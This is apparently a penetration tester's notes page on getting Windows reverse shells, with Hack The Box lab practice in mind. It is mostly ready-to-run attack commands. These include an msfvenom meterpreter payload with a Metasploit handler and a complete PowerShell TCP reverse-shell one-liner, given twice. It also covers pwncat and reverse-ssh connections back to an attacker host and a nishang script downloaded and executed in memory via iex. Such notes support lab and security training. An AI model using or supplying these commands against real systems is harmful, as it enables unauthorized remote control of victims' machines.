Shells
Normal Shells
Meterpreter
First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx
Then, in your attacker machine, run Metasploit and start a handler:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 10.10.14.73
run
Replace the port and IP address with your own ones, of course.
Interactive Powershell Reverse Shell
Caveat: stderr doesn't work!
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Full TTY Shells
Pwncat
Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.
Probably a good idea to switch to bash if using ZSH:
exec bash --login
If your target machine doesn't have internet access, then you'll need to download the plugins first:
pwncat --download-plugins
Listen on port 4444:
pwncat -m windows -lp 4444
Then connect to the pwncat with either a powershell.exe or cmd.exe reverse shell:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Reverse SSH Shell
Features:
Full TTY shell
File sharing via SFTP
Port forwarding
At least Windows 7 or Windows server 2008 (Windows 10 for conpty, need workaround for lower windows versions for full TTY functionality)
Linux kernel version 2.6.23 and higher
Caveats:
SCP doesn't seem to work
SSH port forwarding doesn't seem to work
It hangs sometimes
Evades antivirus: Don't know
First run this on your machine:
./reverse-ssh -v -l :4444
Then the following on the victim machine (you can use the upx packed executable, use ssh-shellhost on older machines):
.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP
And finally on your machine:
ssh -p 8888 127.0.0.1
The default password is letmeinbrudipls
NB! If the target doesn't have conpty (pre-windows 10, build 17763), then you need the following workaround:
upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP
The shellhost.exe executable needs to be in the same directory. It's an executable from OpenSSH.
Rlwrap with nishang
Serve the script on your machine. Then download the nishang shell to memory:
powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');
Start a listener on SOME_PORT on the attacker machine. Use rlwrap as explained here (not tested).
Then run the reverse shell.
Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT
Socat
I think socat can be used to make a decent reverse shell?
Last updated
Was this helpful?